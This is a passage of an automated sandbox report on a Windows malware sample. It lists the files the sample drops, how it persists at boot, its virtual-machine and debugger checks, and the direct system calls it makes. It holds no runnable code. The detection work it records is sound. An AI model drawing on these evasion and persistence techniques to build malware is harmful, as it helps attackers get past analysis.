                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCAD83A push rdx; retf 8_2_00007FFB0BCAD83B
                  Source: C:\Users\user\ActiveISO.exeFile created: C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Widgets.dllJump to dropped file
                  Source: C:\Users\user\ActiveISO.exeFile created: C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Gui.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\msvcp140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Gui.dllJump to dropped file
                  Source: C:\Users\user\ActiveISO.exeFile created: C:\Users\user\AppData\Roaming\UploadHost_UW\msvcp140.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeJump to dropped file
                  Source: C:\Users\user\ActiveISO.exeFile created: C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5PrintSupport.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Widgets.dllJump to dropped file
                  Source: C:\Users\user\ActiveISO.exeFile created: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Network.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5PrintSupport.dllJump to dropped file
                  Source: C:\Users\user\ActiveISO.exeFile created: C:\Users\user\AppData\Roaming\UploadHost_UW\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\josvehJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\vcruntime140_1.dllJump to dropped file
                  Source: C:\Users\user\ActiveISO.exeFile created: C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Network.dllJump to dropped file
                  Source: C:\Users\user\ActiveISO.exeFile created: C:\Users\user\AppData\Roaming\UploadHost_UW\StarBurn.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\ActiveISO.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\itpyyyxJump to dropped file
                  Source: C:\Users\user\ActiveISO.exeFile created: C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\vcruntime140.dllJump to dropped file
                  Source: C:\Users\user\ActiveISO.exeFile created: C:\Users\user\AppData\Roaming\UploadHost_UW\vcruntime140_1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\StarBurn.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\msvcp140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Gui.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Widgets.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Network.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5PrintSupport.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\vcruntime140_1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\ActiveISO.exeJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\vcruntime140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\StarBurn.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\josvehJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\itpyyyxJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\msvcp140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Gui.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Widgets.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5Network.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\Qt5PrintSupport.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\vcruntime140_1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\ActiveISO.exeJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\vcruntime140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\StarBurn.dllJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JOSVEH
                  Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\ITPYYYX
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCAC840 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00007FFB0BCAC840
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6D143B54
                  Source: C:\Users\user\ActiveISO.exeCode function: GetAdaptersInfo,GetAdaptersInfo,_strlwr,strstr,free,GetComputerNameA,getenv,GetDiskFreeSpaceA,8_2_00007FF65374C0B0
                  Source: C:\Users\user\ActiveISO.exeCode function: GetAdaptersInfo,_strlwr,strstr,free,8_2_00007FF65374BFF0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: GetAdaptersInfo,_strlwr,strstr,free,10_2_00007FF6B1FFBFF0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: GetAdaptersInfo,GetAdaptersInfo,_strlwr,strstr,free,GetComputerNameA,getenv,GetDiskFreeSpaceA,10_2_00007FF6B1FFC0B0
                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\josvehJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\itpyyyxJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe TID: 6844Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe TID: 6960Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe TID: 2436Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,6_2_0040301A
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,6_2_00402B79
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC7A370 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,8_2_00007FFB0BC7A370
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: TVr2Z822J3.exe, 00000006.00000002.1364214147.00000000005D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                  Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                  Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                  Source: TVr2Z822J3.exe, 00000006.00000002.1364214147.00000000005D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y2s[
                  Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                  Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                  Source: UploadAlt_Ti.exe, 0000000F.00000003.1784459699.0000000000585000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                  Source: UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361828373.00007FFB0C440000.00000008.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1430119058.00007FFB0A3C0000.00000008.00000001.01000000.00000014.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
                  Source: C:\Users\user\ActiveISO.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65376AE50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF65376AE50
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,6_2_00406D5D
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653739750 Sleep,??4QString@@QEAAAEAV0@PEBD@Z,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,Sleep,memset,?text@QLineEdit@@QEBA?AVQString@@XZ,?toLocal8Bit@QString@@QEHAA?AVQByteArray@@XZ,??1QString@@QEAA@XZ,??BQByteRef@@QEBADXZ,StarBurn_ISO9660JolietFileTree_BuildImage,?fromLocal8Bit@QString@@SA?AV1@PEBDH@Z,??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z,??1QString@@QEAA@XZ,memset,?toWCharArray@QString@@QEBAHPEA_W@Z,CreateFileW,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,GetProcessHeap,HeapAlloc,??4QString@@QEAAAEAV0@PEBD@Z,CloseHandle,GetProcessHeap,HeapFree,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,WriteFile,CloseHandle,GetProcessHeap,HeapFree,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,??1QByteArray@@QEAA@XZ,??4QString@@QEAAAEAV0@PEBD@Z,CloseHandle,GetProcessHeap,HeapFree,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,??4QString@@QEAAAEAV0@PEBD@Z,CloseHandle,GetProcessHeap,HeapFree,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,CloseHandle,GetProcessHeap,HeapFree,StarBurn_Destroy,StarBurn_Destroy,StarBurn_UDF2_VolumeDestroy,8_2_00007FF653739750
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65376A6C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF65376A6C0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65376B038 SetUnhandledExceptionFilter,8_2_00007FF65376B038
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65376AE50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF65376AE50
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCC3714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FFB0BCC3714
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B201A6C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF6B201A6C0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B201B038 SetUnhandledExceptionFilter,10_2_00007FF6B201B038
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B201AE50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FF6B201AE50
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FFB09D58C6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFB09D58C6C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x7FF7880C030DJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtDeviceIoControlFile: Direct from: 0x7FF787F8E8FAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF7880C4190Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtProtectVirtualMemory: Direct from: 0x7FFB0AB094F5Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0x110Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtCreateFile: Direct from: 0x23BF4762D58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtClose: Indirect: 0x14012000F
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQueryInformationToken: Direct from: 0x7FF787F29BCEJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtOpenFile: Direct from: 0x7FF678143D62Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQueryValueKey: Direct from: 0x7FF787F57548Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF78805D0BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtProtectVirtualMemory: Direct from: 0x7FF7880CDC66Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0x7FFB0BE89635Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0x2855E5B9BD0Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0x7FFB0AB08E14Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x7FF787F2D3F7Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF78800B4C6Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtReadFile: Direct from: 0x7FF787F24C4CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF78806490BJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtProtectVirtualMemory: Direct from: 0x7FF78805F8E2Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0xA0A76ACBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtProtectVirtualMemory: Direct from: 0x7FF787FCBB21Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x7FF677FD2D17Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtClose: Direct from: 0x2
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtProtectVirtualMemory: Direct from: 0x3Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF787F24A97Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF787F2D51EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQueryValueKey: Direct from: 0x7FF787F572F3Jump to behavior
                  Source: C:\Users\user\ActiveISO.exeNtQuerySystemInformation: Direct from: 0x64B6CFDD90Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtClose: Direct from: 0x23BF2C98090
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtQuerySystemInformation: Direct from: 0x28500000000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtSetInformationProcess: Direct from: 0x7FF787F355CCJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtCreateNamedPipeFile: Direct from: 0x2B7CD454DC1Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x7FF678008C4AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQueryInformationProcess: Direct from: 0x7FF787F33FCBJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtQuerySystemInformation: Direct from: 0x7FFB40CB21D3Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtClose: Direct from: 0x2855E608250
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQuerySystemInformation: Direct from: 0x7FF787F271B9Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0x23BF2C4BAE0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQueryInformationToken: Direct from: 0x7FF787F52D17Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x7FF677FAD3F7Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0x7FFB0BE88E14Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQuerySystemInformation: Direct from: 0x7FF787F8C708Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtProtectVirtualMemory: Direct from: 0x7FFB0BE894F5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQueryValueKey: Direct from: 0x7FF787F56B22Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x7FFB2CE826A1Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtClose: Direct from: 0x7FF787F34A76
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQueryValueKey: Direct from: 0x7FF787F570D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x7FF67814030DJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQuerySystemInformation: Direct from: 0x7FF787FC3EAFJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF78805D7D5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateFile: Direct from: 0x7FF7880C2CFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtCreateThreadEx: Direct from: 0x7FF787E741B3Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF787F8FF21Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtClose: Direct from: 0x14011D864
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtClose: Direct from: 0x7FF7880C53F7
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtOpenKeyEx: Direct from: 0x7FF787F1CB47Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtClose: Direct from: 0x7FF7880C5405
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FF787E77F9BJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtProtectVirtualMemory: Direct from: 0x7FFB0D5E94F5Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtClose: Direct from: 0x2B7CBA9EF70
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtRequestWaitReplyPort: Direct from: 0x7FF787FC3C48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQuerySystemInformation: Direct from: 0x7FF787FBDB3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtProtectVirtualMemory: Direct from: 0x7FF787FC3A8BJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0x2B7CBA4F950Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtProtectVirtualMemory: Direct from: 0x7FF7880C3D62Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtProtectVirtualMemory: Direct from: 0x7FF7880CDB8EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtProtectVirtualMemory: Direct from: 0x7FF787F144E7Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtQuerySystemInformation: Direct from: 0x2B700000000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQueryInformationProcess: Direct from: 0x7FF787F3463BJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtProtectVirtualMemory: Direct from: 0x7FF787F20560Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQuerySystemInformation: Direct from: 0x7FF7880C6F1FJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQuerySystemInformation: Direct from: 0x7FF787F20161Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtCreateFile: Direct from: 0x285600B5D58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQuerySystemInformation: Direct from: 0x7FF7880603DDJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtOpenFile: Direct from: 0x7FF677F944E7Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0x7FFB0D5E8E14Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtProtectVirtualMemory: Direct from: 0x7FF787F327CDJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtQuerySystemInformation: Direct from: 0x7FF78805C262Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtCreateNamedPipeFile: Direct from: 0x23BF4764DC1Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CEA4B5EJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtCreateNamedPipeFile: Direct from: 0x285600B7DC1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0x7FFB0D5E9635Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeNtAllocateVirtualMemory: Direct from: 0x7FFB0AB09635Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtClose: Direct from: 0x7FF7880C53E3
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtSetInformationProcess: Direct from: 0x7FF787F33EEDJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeNtProtectVirtualMemory: Direct from: 0x7FF7880CBB2FJump to behavior
